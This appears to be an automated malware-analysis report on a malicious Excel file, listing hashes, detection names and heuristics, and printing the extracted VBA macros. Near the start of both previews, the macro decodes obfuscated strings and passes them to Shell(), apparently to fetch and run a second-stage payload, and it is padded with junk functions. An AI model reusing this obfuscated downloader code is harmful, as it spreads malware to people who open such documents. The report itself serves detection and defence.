Office (OLE) malware analysis — malicious · 069b517eeca2f04f

MALICIOUS

Office (OLE)

182.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2020-06-01

MD5: 789f27200694ca01a55dcf173aaba5e0 SHA-1: 6e3ef01c46ca85367cf923215f1ef69aae493db7 SHA-256: 069b517eeca2f04f7f0923a5a52cb2a2f1a840c04c7f382851ddccd37abd16dd

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. This function is used to execute external commands. The ClamAV detection name 'Xls.Malware.Stratos-7506050-0' further confirms the malicious nature of the file. The VBA macro likely uses the Shell() function to download and execute a second-stage payload, a common technique for malware distribution.

Heuristics 3

ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34839 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	34839 bytes
SHA-256: `4d8dd9910342e3f72e0c9caf31966ee2ed63b26a77753ced8b7c386dd0bba753`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub buhajskd() h0m = dF8aNT3QE("qwlxe$lxxt>``n2qt`", "4") Shell (h0m + dF8aNT3QE("ehnl4q\Ew\|jweewhm", "4")) End Sub Private Function dDMZBUAYqPBvNwTDNTPcsHO() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: End Function Private Function jEulzJssffGOcDCbsEtqkCzVFQQSevwRSd() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End End Function Private Function kzUVfpkNdwPeSyHIGLwpwbo() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End End Function Private Function QKTsmPRySYgVBKK() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End GoTo zerqGJMEdslUC zerqGJMEdslUC: End Function Public Sub aCGURANnnOQjLfKj() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End GoTo zerqGJMEdslUC zerqGJMEdslUC: If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End End Sub Public Function zZBgeLAULCPbJIwwY() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End GoTo zerqGJMEdslUC zerqGJMEdslUC: If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End Dim TrJVJHBTQnQin As Integer For TrJVJHBTQnQin = 0 To 9 DoEvents Next TrJVJHBTQnQin End Function Public Function jktRycrYexFvbVQUaK() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End GoTo zerqGJMEdslUC zerqGJMEdslUC: If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End Dim TrJVJHBTQnQin As Integer For TrJVJHBTQnQin = 0 To 9 DoEvents Next TrJVJHBTQnQin GoTo oEHKCbEjSODYNESd oEHKCbEjSODYNESd: End Function Private Sub LylMjvJrIuyYMJDVSq() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End GoTo zerqGJMEdslUC zerqGJMEdslUC: If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End Dim TrJVJHBTQnQin As Integer For TrJVJHBTQnQin = 0 To 9 DoEvents Next TrJVJHBTQnQin GoTo oEHKCbEjSODYNESd oEHKCbEjSODYNESd: Dim yBPlnwGBeuMh As Long yBPlnwGBeuMh = "5872" End Sub Private Sub PZZYdNGNsFEU() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End GoTo zerqGJMEdslUC zerqGJMEdslUC: If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End Dim TrJVJHBTQnQin As Integer For TrJVJHBTQnQin = 0 To 9 DoEvents Next TrJVJHBTQnQin GoTo oEHKCbEjSODYNESd oEHKCbEjSODYNESd: Dim yBPlnwGBeuMh As Long yBPlnwGBeuMh = "5872" Dim GzjRToQVjtOcP As Integer For GzjRToQVjtOcP = 0 To 1 DoEvents Next GzjRToQVjtOcP End Sub Public Function MtKxBbBMGZVs() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End GoTo zerqGJMEdslUC zerqGJMEdslUC: If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End Dim TrJVJHBTQnQin As Integer For TrJVJHBTQnQin = 0 To 9 DoEvents Next TrJVJHBTQnQin GoTo oEHKCbEjSODYNESd oEHKCbEjSODYNESd: Dim yBPlnwGBeuMh As Long yBPlnwGBeuMh = "5872" Dim GzjRToQVjtOcP As Integer For GzjRToQVjtOcP = 0 To 1 DoEvents Next GzjRToQVjtOcP GoTo nDSoclIDhj nDSoclIDhj: End Function Private Sub kpxnSbcafCJQuHGQbe() GoTo IJqxPYNtopndkrHjiyoriHkPM IJqxPYNtopndkrHjiyoriHkPM: If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResa ... (truncated)

SHA-256: 4d8dd9910342e3f72e0c9caf31966ee2ed63b26a77753ced8b7c386dd0bba753

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub buhajskd()

h0m = dF8aNT3QE("qwlxe$lxxt>``n2qt`", "4")

Shell (h0m + dF8aNT3QE("ehnl4q\Ew|jweewhm", "4"))

End Sub
Private Function dDMZBUAYqPBvNwTDNTPcsHO()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:

End Function
Private Function jEulzJssffGOcDCbsEtqkCzVFQQSevwRSd()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End

End Function
Private Function kzUVfpkNdwPeSyHIGLwpwbo()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End

End Function
Private Function QKTsmPRySYgVBKK()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:

End Function
Public Sub aCGURANnnOQjLfKj()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End

End Sub
Public Function zZBgeLAULCPbJIwwY()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End
Dim TrJVJHBTQnQin As Integer
For TrJVJHBTQnQin = 0 To 9
   DoEvents
Next TrJVJHBTQnQin

End Function
Public Function jktRycrYexFvbVQUaK()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End
Dim TrJVJHBTQnQin As Integer
For TrJVJHBTQnQin = 0 To 9
   DoEvents
Next TrJVJHBTQnQin
GoTo oEHKCbEjSODYNESd
oEHKCbEjSODYNESd:

End Function
Private Sub LylMjvJrIuyYMJDVSq()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End
Dim TrJVJHBTQnQin As Integer
For TrJVJHBTQnQin = 0 To 9
   DoEvents
Next TrJVJHBTQnQin
GoTo oEHKCbEjSODYNESd
oEHKCbEjSODYNESd:
Dim yBPlnwGBeuMh As Long
yBPlnwGBeuMh = "5872"

End Sub
Private Sub PZZYdNGNsFEU()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End
Dim TrJVJHBTQnQin As Integer
For TrJVJHBTQnQin = 0 To 9
   DoEvents
Next TrJVJHBTQnQin
GoTo oEHKCbEjSODYNESd
oEHKCbEjSODYNESd:
Dim yBPlnwGBeuMh As Long
yBPlnwGBeuMh = "5872"
Dim GzjRToQVjtOcP As Integer
For GzjRToQVjtOcP = 0 To 1
   DoEvents
Next GzjRToQVjtOcP

End Sub
Public Function MtKxBbBMGZVs()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResardHvtnFCZuTZV" Then End
If "BbqiSACQzERdxKykL" = "SvdugkJkvpHEcxVNKVn" Then End
GoTo zerqGJMEdslUC
zerqGJMEdslUC:
If "FYHeNZfbmDRablIDgi" = "NhpfKFGEJuBIZzzOF" Then End
Dim TrJVJHBTQnQin As Integer
For TrJVJHBTQnQin = 0 To 9
   DoEvents
Next TrJVJHBTQnQin
GoTo oEHKCbEjSODYNESd
oEHKCbEjSODYNESd:
Dim yBPlnwGBeuMh As Long
yBPlnwGBeuMh = "5872"
Dim GzjRToQVjtOcP As Integer
For GzjRToQVjtOcP = 0 To 1
   DoEvents
Next GzjRToQVjtOcP
GoTo nDSoclIDhj
nDSoclIDhj:

End Function
Private Sub kpxnSbcafCJQuHGQbe()
GoTo IJqxPYNtopndkrHjiyoriHkPM
IJqxPYNtopndkrHjiyoriHkPM:
If "GNhpeJFFDI" = "ZgKlQnqtlJnCxmGxoBLvuiTvResa
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.